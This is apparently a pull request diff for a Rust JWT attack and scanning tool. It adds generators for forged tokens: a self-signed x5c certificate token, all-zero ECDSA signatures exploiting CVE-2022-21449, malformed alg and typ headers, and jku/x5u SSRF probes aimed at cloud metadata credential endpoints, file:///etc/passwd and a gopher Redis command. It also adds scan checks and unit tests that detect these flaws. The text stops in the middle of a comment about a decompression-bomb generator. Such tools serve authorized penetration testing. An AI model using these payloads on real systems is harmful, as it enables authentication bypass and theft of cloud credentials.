### PR TITLE
feat: 7 more JWT attack payloads + matching scan checks

### DIFF
--- a/src/cmd/mod.rs
+++ b/src/cmd/mod.rs
@@ -157,7 +157,7 @@ pub enum Commands {
         #[arg(long, default_value = "https")]
         jwk_protocol: String,
 
-        /// Target payload types (comma-separated: all,none,jku,x5u,alg_confusion,kid_sql,kid_traversal,x5c,cty,jwk_embed,crit,b64,empty_sig)
+        /// Target payload types (comma-separated: all,none,jku,x5u,ssrf,alg_confusion,alg_edge,kid_sql,kid_traversal,kid_predictable,x5c,x5c_signed,cty,jwk_embed,crit,b64,empty_sig,psychic,typ_confusion,zip)
         #[arg(long, default_value = "all")]
         target: Option<String>,
     },

--- a/src/cmd/payload.rs
+++ b/src/cmd/payload.rs
@@ -55,12 +55,19 @@ fn generate_payloads(
         "alg_confusion",
         "kid_sql",
         "kid_traversal",
+        "kid_predictable",
         "x5c",
+        "x5c_signed",
         "cty",
         "jwk_embed",
         "crit",
         "b64",
         "empty_sig",
+        "psychic",
+        "typ_confusion",
+        "alg_edge",
+        "ssrf",
+        "zip",
     ];
     for t in &targets {
         if !valid_targets.contains(&t.as_str()) && t != "all" {
@@ -185,6 +192,79 @@ fn generate_payloads(
         if let Ok(payloads) = crate::payload::generate_empty_sig_payload(token) {
             for payload in payloads {
                 println!("\n  {}", "Empty/Stripped Signature".bold());
+                println!("  {payload}");
+            }
+        }
+    }
+
+    // Generate self-signed x5c (real signed token)
+    if should_generate_all || targets.contains("x5c_signed") {
+        match crate::payload::generate_x5c_signed_payload(token) {
+            Ok(payload) => {
+                println!("\n  {}", "x5c Self-signed Cert (signed)".bold());
+                println!("  {payload}");
+            }
+            Err(e) => {
+                utils::log_warning(format!("Failed to generate x5c_signed payload: {e}"));
+            }
+        }
+    }
+
+    // Generate ECDSA psychic signatures (CVE-2022-21449)
+    if should_generate_all || targets.contains("psychic") {
+        if let Ok(payloads) = crate::payload::generate_psychic_signature_payload(token) {
+            for payload in payloads {
+                println!("\n  {}", "ECDSA Psychic Signature (CVE-2022-21449)".bold());
+                println!("  {payload}");
+            }
+        }
+    }
+
+    // Generate typ confusion payloads
+    if should_generate_all || targets.contains("typ_confusion") {
+        if let Ok(payloads) = crate::payload::generate_typ_confusion_payload(token) {
+            for payload in payloads {
+                println!("\n  {}", "typ Confusion".bold());
+                println!("  {payload}");
+            }
+        }
+    }
+
+    // Generate alg edge-value payloads
+    if should_generate_all || targets.contains("alg_edge") {
+        if let Ok(payloads) = crate::payload::generate_alg_edge_payload(token) {
+            for payload in payloads {
+                println!("\n  {}", "alg Edge Value".bold());
+                println!("  {payload}");
+            }
+        }
+    }
+
+    // Generate jku/x5u SSRF probes
+    if should_generate_all || targets.contains("ssrf") {
+        if let Ok(payloads) = crate::payload::generate_jku_x5u_ssrf_payload(token) {
+            for payload in payloads {
+                println!("\n  {}", "jku/x5u SSRF Probe".bold());
+                println!("  {payload}");
+            }
+        }
+    }
+
+    // Generate zip variant + bomb payloads
+    if should_generate_all || targets.contains("zip") {
+        if let Ok(payloads) = crate::payload::generate_zip_payload(token) {
+            for payload in payloads {
+                println!("\n  {}", "zip Variant / Decompression Bomb".bold());
+                println!("  {payload}");
+            }
+        }
+    }
+
+    // Generate kid predictable-path payloads
+    if should_generate_all || targets.contains("kid_predictable") {
+        if let Ok(payloads) = crate::payload::generate_kid_predictable_payload(token, None) {
+            for payload in payloads {
+                println!("\n  {}", "kid Predictable Path".bold());
                 println!("  {payload}");
             }
         }

--- a/src/cmd/scan.rs
+++ b/src/cmd/scan.rs
@@ -91,14 +91,48 @@ pub fn execute(
     }
 }
 
+/// Build a best-effort `DecodedToken` from the raw header bytes for tokens that
+/// `jwt::decode` rejects. Claims are left null and `algorithm` is a sentinel —
+/// only header-shape checks should consume the result.
+fn parse_header_only(token: &str) -> Result<jwt::DecodedToken> {
+    use base64::Engine;
+    use std::collections::HashMap;
+    let parts: Vec<&str> = token.split('.').collect();
+    let header_b64 = parts.first().copied().unwrap_or("");
+    let header_bytes = base64::engine::general_purpose::URL_SAFE_NO_PAD
+        .decode(header_b64)
+        .map_err(|e| anyhow::anyhow!("token header is not base64url: {e}"))?;
+    let header: HashMap<String, serde_json::Value> = serde_json::from_slice(&header_bytes)
+        .map_err(|e| anyhow::anyhow!("token header is not JSON: {e}"))?;
+    Ok(jwt::DecodedToken {
+        header,
+        claims: serde_json::Value::Null,
+        algorithm: jsonwebtoken::Algorithm::HS256, // sentinel; do not trust
+    })
+}
+
 /// Run comprehensive vulnerability scan
 fn run_scan(token: &str, options: &ScanOptions) -> Result<()> {
     let mut results: Vec<VulnerabilityResult> = Vec::new();
 
-    // Decode token first to get basic info
-    let decoded = jwt::decode(token)?;
+    // Try strict decode first. If it fails, fall back to a header-only view so
+    // the shape checks (which the malformed-token detectors below depend on)
+    // still run — that's the whole point of catching invalid `alg`, `zip`,
+    // psychic signatures, etc.
+    let (decoded, strict_ok, decode_err) = match jwt::decode(token) {
+        Ok(d) => (d, true, None),
+        Err(e) => {
+            let err_str = e.to_string();
+            let fallback = parse_header_only(token)?;
+            (fallback, false, Some(err_str))
+        }
+    };
 
-    let alg_str = format!("{:?}", decoded.algorithm);
+    let header_alg_display = decoded
+        .header
+        .get("alg")
+        .map(|v| v.to_string())
+        .unwrap_or_else(|| "<missing>".to_string());
     let typ = decoded
         .header
         .get("typ")
@@ -106,46 +140,43 @@ fn run_scan(token: &str, options: &ScanOptions) -> Result<()> {
         .unwrap_or("JWT");
 
     println!("  {}", "Token".bold());
-    println!("  {:<18}{}", "Algorithm".dimmed(), alg_str.cyan());
+    println!(
+        "  {:<18}{}",
+        "Algorithm".dimmed(),
+        header_alg_display.cyan()
+    );
     println!("  {:<18}{}", "Type".dimmed(), typ);
-
-    // Check 1: None Algorithm Vulnerability
-    results.push(check_none_algorithm(token, &decoded)?);
-
-    // Check 2: Weak Secret (if not skipped)
-    if !options.skip_crack {
-        results.push(check_weak_secret(token, &decoded, options)?);
+    if let Some(err) = &decode_err {
+        println!(
+            "  {:<18}{}",
+            "Strict decode".dimmed(),
+            format!("rejected: {err}").yellow()
+        );
     }
 
-    // Check 3: Algorithm Confusion
+    // Header-shape / raw-bytes checks — always run.
+    results.push(check_none_algorithm(token, &decoded)?);
     results.push(check_algorithm_confusion(token, &decoded)?);
-
-    // Check 4: Token Expiration
-    results.push(check_token_expiration(&decoded)?);
-
-    // Check 5: Missing Claims
-    results.push(check_missing_claims(&decoded)?);
-
-    // Check 6: Kid Header Vulnerabilities
     results.push(check_kid_vulnerabilities(&decoded)?);
-
-    // Check 7: JKU/X5U Header Vulnerabilities
     results.push(check_jku_x5u_vulnerabilities(&decoded)?);
-
-    // Check 8: Embedded JWK Header
     results.push(check_jwk_header(&decoded)?);
-
-    // Check 9: crit Header
     results.push(check_crit_header(&decoded)?);
-
-    // Check 10: RFC 7797 b64 Header
     results.push(check_b64_header(&decoded)?);
-
-    // Check 11: Empty / suspicious signature
     results.push(check_signature_segment(token, &decoded)?);
+    results.push(check_typ_confusion(&decoded)?);
+    results.push(check_alg_edge(token, &decoded)?);
+    results.push(check_psychic_signature(token, &decoded)?);
+    results.push(check_zip_header(&decoded)?);
 
-    // Check 12: Sensitive claim data (PII)
-    results.push(check_sensitive_claims(&decoded)?);
+    // Claim-dependent checks — skip when strict decode failed (claims aren't trustworthy).
+    if strict_ok {
+        if !options.skip_crack {
+            results.push(check_weak_secret(token, &decoded, options)?);
+        }
+        results.push(check_token_expiration(&decoded)?);
+        results.push(check_missing_claims(&decoded)?);
+        results.push(check_sensitive_claims(&decoded)?);
+    }
 
     // Display results summary
     display_results(&results);
@@ -195,7 +226,12 @@ fn check_weak_secret(
     options: &ScanOptions,
 ) -> Result<VulnerabilityResult> {
     // Only check HMAC algorithms
-    let alg_str = format!("{:?}", decoded.algorithm);
+    let alg_str = decoded
+        .header
+        .get("alg")
+        .and_then(|v| v.as_str())
+        .map(|s| s.to_uppercase())
+        .unwrap_or_else(|| format!("{:?}", decoded.algorithm));
     if !alg_str.starts_with("HS") {
         return Ok(VulnerabilityResult {
             name: "Weak Secret".to_string(),
@@ -260,13 +296,20 @@ fn check_algorithm_confusion(
     _token: &str,
     decoded: &jwt::DecodedToken,
 ) -> Result<VulnerabilityResult> {
-    let alg_str = format!("{:?}", decoded.algorithm);
+    // Pull alg from the raw header so this still works on tokens that fail
+    // strict decode and only have a synthetic DecodedToken.
+    let alg_str = decoded
+        .header
+        .get("alg")
+        .and_then(|v| v.as_str())
+        .map(|s| s.to_string())
+        .unwrap_or_else(|| format!("{:?}", decoded.algorithm));
+    let alg_upper = alg_str.to_uppercase();
 
-    // Check if token uses asymmetric algorithm (RS256, ES256, etc.)
-    let uses_asymmetric = alg_str.starts_with("RS")
-        || alg_str.starts_with("ES")
-        || alg_str.starts_with("PS")
-        || alg_str == "EdDSA";
+    let uses_asymmetric = alg_upper.starts_with("RS")
+        || alg_upper.starts_with("ES")
+        || alg_upper.starts_with("PS")
+        || alg_upper == "EDDSA";
 
     let result = if uses_asymmetric {
         VulnerabilityResult {
@@ -731,6 +774,232 @@ fn check_jku_x5u_vulnerabilities(decoded: &jwt::DecodedToken) -> Result<Vulnerab
     Ok(result)
 }
 
+/// Check for `typ` confusion (non-standard or omitted media types).
+fn check_typ_confusion(decoded: &jwt::DecodedToken) -> Result<VulnerabilityResult> {
+    let name = "typ Confusion".to_string();
+    let result = match decoded.header.get("typ").and_then(|v| v.as_str()) {
+        Some("JWT") => VulnerabilityResult {
+            name,
+            vulnerable: false,
+            details: "'typ' is JWT".to_string(),
+            severity: Severity::Info,
+        },
+        Some(other) => {
+            let suspicious = matches!(
+                other,
+                "at+jwt" | "JOSE" | "JOSE+JSON" | "application/jwt" | "jwt"
+            ) || other.contains('\0');
+            if suspicious {
+                VulnerabilityResult {
+                    name,
+                    vulnerable: true,
+                    details: format!(
+                        "Non-canonical 'typ': '{}' — verify the server accepts only expected media types",
+                        other
+                    ),
+                    severity: Severity::Medium,
+                }
+            } else {
+                VulnerabilityResult {
+                    name,
+                    vulnerable: false,
+                    details: format!("'typ' is '{}'", other),
+                    severity: Severity::Info,
+                }
+            }
+        }
+        None => VulnerabilityResult {
+            name,
+            vulnerable: true,
+            details:
+                "'typ' header missing — some validators reject, others accept arbitrary tokens"
+                    .to_string(),
+            severity: Severity::Low,
+        },
+    };
+    Ok(result)
+}
+
+/// Check for edge-shape `alg` values (empty, null, array, whitespace).
+fn check_alg_edge(token: &str, _decoded: &jwt::DecodedToken) -> Result<VulnerabilityResult> {
+    use base64::Engine;
+    let name = "alg Edge Value".to_string();
+    let parts: Vec<&str> = token.split('.').collect();
+    let header_b64 = parts.first().copied().unwrap_or("");
+    let raw = match base64::engine::general_purpose::URL_SAFE_NO_PAD.decode(header_b64) {
+        Ok(b) => b,
+        Err(_) => {
+            return Ok(VulnerabilityResult {
+                name,
+                vulnerable: false,
+                details: "Header not base64url".to_string(),
+                severity: Severity::Info,
+            });
+        }
+    };
+    let val: serde_json::Value = match serde_json::from_slice(&raw) {
+        Ok(v) => v,
+        Err(_) => {
+            return Ok(VulnerabilityResult {
+                name,
+                vulnerable: false,
+                details: "Header not JSON".to_string(),
+                severity: Severity::Info,
+            });
+        }
+    };
+    let alg = val.get("alg");
+    let result = match alg {
+        None => VulnerabilityResult {
+            name,
+            vulnerable: true,
+            details: "'alg' header is missing".to_string(),
+            severity: Severity::High,
+        },
+        Some(serde_json::Value::Null) => VulnerabilityResult {
+            name,
+            vulnerable: true,
+            details: "'alg' header is null".to_string(),
+            severity: Severity::High,
+        },
+        Some(serde_json::Value::Array(_)) => VulnerabilityResult {
+            name,
+            vulnerable: true,
+            details: "'alg' is an array — parsers disagree on which element to take".to_string(),
+            severity: Severity::High,
+        },
+        Some(serde_json::Value::String(s)) => {
+            let trimmed = s.trim();
+            if s.is_empty() {
+                VulnerabilityResult {
+                    name,
+                    vulnerable: true,
+                    details: "'alg' is an empty string".to_string(),
+                    severity: Severity::High,
+                }
+            } else if trimmed != s {
+                VulnerabilityResult {
+                    name,
+                    vulnerable: true,
+                    details: format!("'alg' has surrounding whitespace: '{}'", s),
+                    severity: Severity::Medium,
+                }
+            } else if s.contains('\0') {
+                VulnerabilityResult {
+                    name,
+                    vulnerable: true,
+                    details: "'alg' contains a NUL byte".to_string(),
+                    severity: Severity::High,
+                }
+            } else {
+                VulnerabilityResult {
+                    name,
+                    vulnerable: false,
+                    details: "'alg' is a plain string".to_string(),
+                    severity: Severity::Info,
+                }
+            }
+        }
+        Some(other) => VulnerabilityResult {
+            name,
+            vulnerable: true,
+            details: format!("'alg' has unexpected JSON type: {}", other),
+            severity: Severity::Medium,
+        },
+    };
+    Ok(result)
+}
+
+/// Detect ECDSA psychic signatures (r=s=0, CVE-2022-21449).
+fn check_psychic_signature(
+    token: &str,
+    decoded: &jwt::DecodedToken,
+) -> Result<VulnerabilityResult> {
+    use base64::Engine;
+    let name = "Psychic Signature".to_string();
+    let alg_str = format!("{:?}", decoded.algorithm).to_uppercase();
+    if !alg_str.starts_with("ES") {
+        return Ok(VulnerabilityResult {
+            name,
+            vulnerable: false,
+            details: format!("Not applicable for {}", alg_str),
+            severity: Severity::Info,
+        });
+    }
+    let parts: Vec<&str> = token.split('.').collect();
+    let sig_b64 = parts.get(2).copied().unwrap_or("");
+    let sig_bytes = match base64::engine::general_purpose::URL_SAFE_NO_PAD.decode(sig_b64) {
+        Ok(b) => b,
+        Err(_) => {
+            return Ok(VulnerabilityResult {
+                name,
+                vulnerable: false,
+                details: "Signature is not base64url".to_string(),
+                severity: Severity::Info,
+            });
+        }
+    };
+    let all_zero = !sig_bytes.is_empty() && sig_bytes.iter().all(|b| *b == 0);
+    let result = if all_zero {
+        VulnerabilityResult {
+            name,
+            vulnerable: true,
+            details: format!(
+                "{} signature is all-zero — accepted by vulnerable Java JDK (CVE-2022-21449)",
+                alg_str
+            ),
+            severity: Severity::Critical,
+        }
+    } else {
+        VulnerabilityResult {
+            name,
+            vulnerable: false,
+            details: "ECDSA signature is non-zero".to_string(),
+            severity: Severity::Info,
+        }
+    };
+    Ok(result)
+}
+
+/// Check for non-standard `zip` (compression) values.
+fn check_zip_header(decoded: &jwt::DecodedToken) -> Result<VulnerabilityResult> {
+    let name = "zip Header".to_string();
+    let result = match decoded.header.get("zip") {
+        None => VulnerabilityResult {
+            name,
+            vulnerable: false,
+            details: "No 'zip' header".to_string(),
+            severity: Severity::Info,
+        },
+        Some(v) => match v.as_str() {
+            // "DEF" is the only RFC 7516 §4.1.3 value.
+            Some("DEF") => VulnerabilityResult {
+                name,
+                vulnerable: true,
+                details: "Token uses DEFLATE compression — verify the decoder enforces a size cap"
+                    .to_string(),
+                severity: Severity::Low,
+            },
+            Some(other) => VulnerabilityResult {
+                name,
+                vulnerable: true,
+                details: format!(
+                    "Non-standard 'zip' value: '{}' — only 'DEF' is defined",
+                    other
+                ),
+                severity: Severity::Medium,
+            },
+            None => VulnerabilityResult {
+                name,
+                vulnerable: true,
+                details: format!("'zip' is not a string: {}", v),
+                severity: Severity::Medium,
+            },
+        },
+    };
+    Ok(result)
+}
+
 /// Display scan results
 fn display_results(results: &[VulnerabilityResult]) {
     println!("\n  {}", "Results".bold());
@@ -832,6 +1101,18 @@ fn generate_attack_payloads(token: &str, results: &[VulnerabilityResult]) -> Res
             "Signature Segment" => {
                 targets.insert("empty_sig");
             }
+            "typ Confusion" => {
+                targets.insert("typ_confusion");
+            }
+            "alg Edge Value" => {
+                targets.insert("alg_edge");
+            }
+            "Psychic Signature" => {
+                targets.insert("psychic");
+            }
+            "zip Header" => {
+                targets.insert("zip");
+            }
             _ => {}
         }
     }
@@ -902,6 +1183,38 @@ fn generate_attack_payloads(token: &str, results: &[VulnerabilityResult]) -> Res
             if target_str.contains("empty_sig") {
                 if let Ok(payloads) = payload::generate_empty_sig_payload(token) {
                     for p in payloads.iter().take(2) {
+                        println!("  {}", p);
+                    }
+                }
+            }
+
+            if target_str.contains("typ_confusion") {
+                if let Ok(payloads) = payload::generate_typ_confusion_payload(token) {
+                    for p in payloads.iter().take(2) {
+                        println!("  {}", p);
+                    }
+                }
+            }
+
+            if target_str.contains("alg_edge") {
+                if let Ok(payloads) = payload::generate_alg_edge_payload(token) {
+                    for p in payloads.iter().take(2) {
+                        println!("  {}", p);
+                    }
+                }
+            }
+
+            if target_str.contains("psychic") {
+                if let Ok(payloads) = payload::generate_psychic_signature_payload(token) {
+                    for p in payloads.iter().take(2) {
+                        println!("  {}", p);
+                    }
+                }
+            }
+
+            if target_str.contains("zip") {
+                if let Ok(payloads) = payload::generate_zip_payload(token) {
+                    for p in payloads.iter().take(1) {
                         println!("  {}", p);
                     }
                 }
@@ -1083,6 +1396,19 @@ mod tests {
         format!("{header_b64}.{claims_b64}.fake")
     }
 
+    /// Build a synthetic `DecodedToken` directly from a raw header JSON, with
+    /// null claims and an HS256 sentinel algorithm. Use this for testing
+    /// header-shape checks against headers that `jwt::decode` would reject.
+    fn header_only_decoded(header_json: &str) -> jwt::DecodedToken {
+        let header: std::collections::HashMap<String, serde_json::Value> =
+            serde_json::from_str(header_json).unwrap();
+        jwt::DecodedToken {
+            header,
+            claims: serde_json::Value::Null,
+            algorithm: jsonwebtoken::Algorithm::HS256,
+        }
+    }
+
     #[test]
     fn test_check_b64_header_false_is_high() {
         let token = synthetic_token(json!({ "b64": false }), json!({}));
@@ -1216,5 +1542,123 @@ mod tests {
             !r.vulnerable,
             "alphanumeric IDs must not be classified as credit cards"
         );
+    }
+
+    #[test]
+    fn test_check_typ_confusion_flags_at_jwt_and_missing() {
+        let token1 = synthetic_token(json!({ "typ": "at+jwt" }), json!({}));
+        let r1 = check_typ_confusion(&jwt::decode(&token1).unwrap()).unwrap();
+        assert!(r1.vulnerable);
+        assert_eq!(r1.severity, Severity::Medium);
+
+        let token2 = synthetic_token(json!({}), json!({}));
+        // Drop the typ field — easiest by building header manually.
+        use base64::Engine;
+        let header_b64 = base64::engine::general_purpose::URL_SAFE_NO_PAD
+            .encode(r#"{"alg":"HS256"}"#.as_bytes());
+        let claims_b64 = base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(b"{}".as_ref());
+        let no_typ = format!("{header_b64}.{claims_b64}.fake");
+        let _ = token2; // silence
+        let r2 = check_typ_confusion(&jwt::decode(&no_typ).unwrap()).unwrap();
+        assert!(r2.vulnerable);
+        assert_eq!(r2.severity, Severity::Low);
+
+        let token3 = synthetic_token(json!({ "typ": "JWT" }), json!({}));
+        let r3 = check_typ_confusion(&jwt::decode(&token3).unwrap()).unwrap();
+        assert!(!r3.vulnerable);
+    }
+
+    #[test]
+    fn test_check_alg_edge_array_value() {
+        use base64::Engine;
+        let raw_header = r#"{"alg":["none","HS256"],"typ":"JWT"}"#;
+        let h = base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(raw_header.as_bytes());
+        let c = base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(b"{}".as_ref());
+        let token = format!("{h}.{c}.fake");
+        // jwt::decode rejects array alg, so use a synthetic header-only DecodedToken.
+        let decoded = header_only_decoded(raw_header);
+        let r = check_alg_edge(&token, &decoded).unwrap();
+        assert!(r.vulnerable);
+        assert_eq!(r.severity, Severity::High);
+        assert!(r.details.contains("array"));
+    }
+
+    #[test]
+    fn test_check_alg_edge_whitespace() {
+        use base64::Engine;
+        let raw_header = r#"{"alg":" HS256 ","typ":"JWT"}"#;
+        let h = base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(raw_header.as_bytes());
+        let c = base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(b"{}".as_ref());
+        let token = format!("{h}.{c}.fake");
+        let decoded = header_only_decoded(raw_header);
+        let r = check_alg_edge(&token, &decoded).unwrap();
+        assert!(r.vulnerable);
+        assert_eq!(r.severity, Severity::Medium);
+    }
+
+    #[test]
+    fn test_check_psychic_signature_detects_all_zero_es256() {
+        use base64::Engine;
+        let header_b64 = base64::engine::general_purpose::URL_SAFE_NO_PAD
+            .encode(r#"{"alg":"ES256","typ":"JWT"}"#.as_bytes());
+        let claims_b64 = base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(b"{}".as_ref());
+        let sig_b64 = base64::engine::general_purpose::URL_SAFE_NO_PAD.encode([0u8; 64]);
+        let token = format!("{header_b64}.{claims_b64}.{sig_b64}");
+        let decoded = jwt::decode(&token).unwrap();
+        let r = check_psychic_signature(&token, &decoded).unwrap();
+        assert!(r.vulnerable);
+        assert_eq!(r.severity, Severity::Critical);
+    }
+
+    #[test]
+    fn test_check_psychic_signature_ignores_non_ecdsa() {
+        let token = create_test_token("HS256", "secret");
+        let decoded = jwt::decode(&token).unwrap();
+        let r = check_psychic_signature(&token, &decoded).unwrap();
+        assert!(!r.vulnerable);
+    }
+
+    #[test]
+    fn test_check_zip_header_def_is_low() {
+        // zip:DEF requires a compressed claims segment for strict decode, so
+        // call the check directly against a header-only DecodedToken.
+        let decoded = header_only_decoded(r#"{"alg":"HS256","typ":"JWT","zip":"DEF"}"#);
+        let r = check_zip_header(&decoded).unwrap();
+        assert!(r.vulnerable);
+        assert_eq!(r.severity, Severity::Low);
+    }
+
+    #[test]
+    fn test_check_zip_header_unknown_is_medium() {
+        let token = synthetic_token(json!({ "zip": "GZIP" }), json!({}));
+        let decoded = jwt::decode(&token).unwrap();
+        let r = check_zip_header(&decoded).unwrap();
+        assert!(r.vulnerable);
+        assert_eq!(r.severity, Severity::Medium);
+    }
+
+    #[test]
+    fn test_check_zip_header_missing_is_info() {
+        let token = synthetic_token(json!({}), json!({}));
+        let decoded = jwt::decode(&token).unwrap();
+        let r = check_zip_header(&decoded).unwrap();
+        assert!(!r.vulnerable);
+    }
+
+    #[test]
+    fn test_parse_header_only_supports_array_alg() {
+        // Tokens with array `alg` fail strict decode; parse_header_only must
+        // still succeed so shape checks can run.
+        use base64::Engine;
+        let raw_header = r#"{"alg":["none","HS256"],"typ":"JWT"}"#;
+        let h = base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(raw_header.as_bytes());
+        let c = base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(b"{}".as_ref());
+        let token = format!("{h}.{c}.fake");
+        assert!(
+            jwt::decode(&token).is_err(),
+            "strict decode must reject array alg"
+        );
+        let decoded = parse_header_only(&token).expect("header-only parse should succeed");
+        assert!(decoded.header.get("alg").unwrap().is_array());
     }
 }

--- a/src/payload/mod.rs
+++ b/src/payload/mod.rs
@@ -425,6 +425,278 @@ pub fn generate_cty_payload(token: &str) -> Result<Vec<String>> {
     payloads
 }
 
+/// Generate a JWT with a self-signed X.509 chain embedded in the `x5c` header.
+///
+/// Mirrors [`generate_jwk_embed_payload`] but uses the `x5c` certificate chain
+/// instead of a `jwk`. Generates a fresh RSA-2048 key pair, builds a minimal
+/// self-signed certificate, embeds its DER in `x5c` (base64 — *not* base64url —
+/// per RFC 7515 §4.1.6), and signs the token with the matching private key.
+/// Libraries that derive the verification key from `x5c[0]` will validate it.
+pub fn generate_x5c_signed_payload(token: &str) -> Result<String> {
+    use openssl::asn1::Asn1Time;
+    use openssl::bn::BigNum;
+    use openssl::hash::MessageDigest;
+    use openssl::pkey::PKey;
+    use openssl::rsa::Rsa;
+    use openssl::x509::{X509Builder, X509NameBuilder};
+
+    let claims_part = extract_claims_part(token)?;
+
+    let rsa = Rsa::generate(2048).map_err(|e| anyhow::anyhow!("RSA gen failed: {e}"))?;
+    let pkey = PKey::from_rsa(rsa).map_err(|e| anyhow::anyhow!("PKey from RSA failed: {e}"))?;
+
+    let mut name = X509NameBuilder::new()?;
+    name.append_entry_by_text("CN", "jwt-hack-injected")?;
+    let name = name.build();
+
+    let mut builder = X509Builder::new()?;
+    builder.set_version(2)?;
+    let serial = BigNum::from_u32(1)?.to_asn1_integer()?;
+    builder.set_serial_number(&serial)?;
+    builder.set_subject_name(&name)?;
+    builder.set_issuer_name(&name)?;
+    builder.set_pubkey(&pkey)?;
+    let not_before = Asn1Time::days_from_now(0)?;
+    let not_after = Asn1Time::days_from_now(365)?;
+    builder.set_not_before(&not_before)?;
+    builder.set_not_after(&not_after)?;
+    builder.sign(&pkey, MessageDigest::sha256())?;
+    let cert = builder.build();
+    let cert_der = cert.to_der()?;
+
+    // RFC 7515 §4.1.6: x5c values are standard base64, not URL-safe base64.
+    let cert_b64 = base64::engine::general_purpose::STANDARD.encode(&cert_der);
+
+    let header = json!({
+        "alg": "RS256",
+        "typ": "JWT",
+        "x5c": [cert_b64],
+    });
+
+    let input = build_signing_input(&header, claims_part)?;
+    let pem = pkey
+        .private_key_to_pem_pkcs8()
+        .map_err(|e| anyhow::anyhow!("export private key: {e}"))?;
+    let key = jsonwebtoken::EncodingKey::from_rsa_pem(&pem)?;
+    let sig_b64 =
+        jsonwebtoken::crypto::sign(input.as_bytes(), &key, jsonwebtoken::Algorithm::RS256)?;
+
+    info!("Generated x5c self-signed certificate payload (signed)");
+    Ok(format!("{input}.{sig_b64}"))
+}
+
+/// Generate ECDSA "psychic signature" payloads (CVE-2022-21449).
+///
+/// Java JDK 15–18 accepted ECDSA signatures with r=s=0. With those bytes in
+/// the signature segment, the JVM's verifier returned `true` regardless of
+/// the input. Emits ES256/ES384/ES512 variants — the signature is the
+/// algorithm's expected length filled with NUL bytes.
+pub fn generate_psychic_signature_payload(token: &str) -> Result<Vec<String>> {
+    let claims_part = extract_claims_part(token)?;
+
+    // (alg, signature length in bytes)
+    // ES256: r||s = 32+32, ES384: 48+48, ES512: 66+66 (P-521 component size).
+    let variants = [("ES256", 64usize), ("ES384", 96), ("ES512", 132)];
+
+    let mut payloads = Vec::with_capacity(variants.len());
+    for (alg, sig_len) in variants {
+        let header = json!({ "alg": alg, "typ": "JWT" });
+        let input = build_signing_input(&header, claims_part)?;
+        let zero_sig = vec![0u8; sig_len];
+        let sig_b64 = general_purpose::URL_SAFE_NO_PAD.encode(&zero_sig);
+        payloads.push(format!("{input}.{sig_b64}"));
+    }
+    info!("Generated psychic-signature (CVE-2022-21449) payloads");
+    Ok(payloads)
+}
+
+/// Generate `typ` confusion header payloads.
+///
+/// Targets servers that key authorization decisions off `typ` (e.g. ID-token
+/// vs access-token discrimination, OAuth 2.0 `at+jwt`). All variants are
+/// header-only (header.payload, no signature) since the target server's
+/// behaviour determines whether the variant is exploitable.
+pub fn generate_typ_confusion_payload(token: &str) -> Result<Vec<String>> {
+    let claims_part = extract_claims_part(token)?;
+
+    // (typ value, alg)
+    let variants: &[(Option<&str>, &str)] = &[
+        (None, "HS256"), // typ omitted entirely
+        (Some("at+jwt"), "HS256"),
+        (Some("JOSE"), "HS256"),
+        (Some("JOSE+JSON"), "HS256"),
+        (Some("application/jwt"), "HS256"),
+        (Some("jwt"), "HS256"),         // lowercase
+        (Some("JWT\u{0000}"), "HS256"), // trailing NUL
+    ];
+
+    let mut payloads = Vec::with_capacity(variants.len());
+    for (typ, alg) in variants {
+        let header = match typ {
+            Some(t) => json!({ "alg": alg, "typ": t }),
+            None => json!({ "alg": alg }),
+        };
+        payloads.push(encode_header_with_claims(&header, claims_part)?);
+    }
+    info!("Generated typ confusion payloads");
+    Ok(payloads)
+}
+
+/// Generate `alg` edge-value header payloads.
+///
+/// Probes parser quirks: empty, null, whitespace-padded, mixed-case, array
+/// forms. Each header is emitted unsigned (header.payload) because the
+/// interesting behaviour is the parser's interpretation of `alg`.
+pub fn generate_alg_edge_payload(token: &str) -> Result<Vec<String>> {
+    let claims_part = extract_claims_part(token)?;
+
+    let variants: Vec<serde_json::Value> = vec![
+        json!({ "alg": "",        "typ": "JWT" }),
+        json!({ "alg": serde_json::Value::Null, "typ": "JWT" }),
+        json!({ "alg": " HS256 ", "typ": "JWT" }),
+        json!({ "alg": "\tHS256", "typ": "JWT" }),
+        json!({ "alg": "hs256",   "typ": "JWT" }),
+        json!({ "alg": "HS256\u{0000}", "typ": "JWT" }),
+        // Array forms — some parsers cast to string-ish.
+        json!({ "alg": ["none", "HS256"], "typ": "JWT" }),
+        json!({ "alg": ["HS256"], "typ": "JWT" }),
+    ];
+
+    let mut payloads = Vec::with_capacity(variants.len());
+    for header in variants {
+        payloads.push(encode_header_with_claims(&header, claims_part)?);
+    }
+    info!("Generated alg edge-value payloads");
+    Ok(payloads)
+}
+
+/// Built-in SSRF/internal-network probe URLs for jku/x5u attacks.
+///
+/// Useful when the server fetches the JWKS URL server-side — these probes
+/// don't require a controlled attacker domain.
+fn ssrf_probe_urls() -> &'static [&'static str] {
+    &[
+        // AWS IMDS v1
+        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
+        // GCP metadata
+        "http://metadata.google.internal/computeMetadata/v1/",
+        // Azure IMDS
+        "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
+        // Loopback common services
+        "http://127.0.0.1:6379/",
+        "http://localhost:11211/",
+        "http://127.0.0.1:80/",
+        // Schemes
+        "file:///etc/passwd",
+        "gopher://127.0.0.1:6379/_INFO%0d%0a",
+        // DNS rebind / shorthand
+        "http://[::1]/",
+        "http://0.0.0.0/",
+    ]
+}
+
+/// Generate jku/x5u SSRF-probe payloads (no `--jwk-attack` required).
+pub fn generate_jku_x5u_ssrf_payload(token: &str) -> Result<Vec<String>> {
+    let claims_part = extract_claims_part(token)?;
+    let mut payloads = Vec::new();
+    for key_type in ["jku", "x5u"] {
+        for url in ssrf_probe_urls() {
+            let header = json!({
+                "alg": "hs256",
+                key_type: url,
+                "typ": "JWT",
+            });
+            payloads.push(encode_header_with_claims(&header, claims_part)?);
+        }
+    }
+    info!("Generated jku/x5u SSRF probe payloads");
+    Ok(payloads)
+}
+
+/// Generate `zip` parameter variants and a DEFLATE decompression-bomb claim.
+///
+/// Covers: non-standard zip values (GZIP, unknown, null), and a real
